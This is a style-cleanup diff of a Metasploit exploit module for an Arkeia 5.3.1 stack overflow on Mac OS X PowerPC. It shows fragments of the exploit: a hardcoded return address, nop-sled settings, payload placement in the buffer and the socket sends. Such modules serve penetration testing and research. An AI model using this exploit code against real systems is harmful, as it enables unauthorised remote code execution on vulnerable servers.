@@ -33,17 +33,16 @@ class MetasploitModule < Msf::Exploit::Remote
           'MinNops' => 700,
           'Compat' =>
                       {
-                        'ConnectionType' => '-find',
-                      },
+                        'ConnectionType' => '-find'
+                      }
         },
-        'Platform' => %w{osx},
         'Targets' => [
           [
             'Arkeia 5.3.1 Stack Return (boot)',
             {
               'Platform' => 'osx',
               'Arch' => ARCH_PPC,
-              'Ret' => 0xbffff910,
+              'Ret' => 0xbffff910
             },
           ],
         ],
@@ -59,18 +58,18 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    info = arkeia_info()
+    info = arkeia_info
     if !(info and info['Version'])
       return Exploit::CheckCode::Safe
     end
 
-    vprint_status("Arkeia Server Information:")
-    info.each_pair { |k, v|
-      vprint_status("   #{k + (" " * (30 - k.length))} = #{v}")
-    }
+    vprint_status('Arkeia Server Information:')
+    info.each_pair do |k, v|
+      vprint_status("   #{k + (' ' * (30 - k.length))} = #{v}")
+    end
 
     if (info['System'] !~ /Darwin/)
-      vprint_status("This module only supports Mac OS X targets")
+      vprint_status('This module only supports Mac OS X targets')
       return Exploit::CheckCode::Detected
     end
 
@@ -100,7 +99,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # Huge nop slep followed by the payload
     buf[112, payload.encoded.length] = payload.encoded
 
-    print_status("Sending request...")
+    print_status('Sending request...')
     begin
       sock.put(head)
       sock.put(buf)
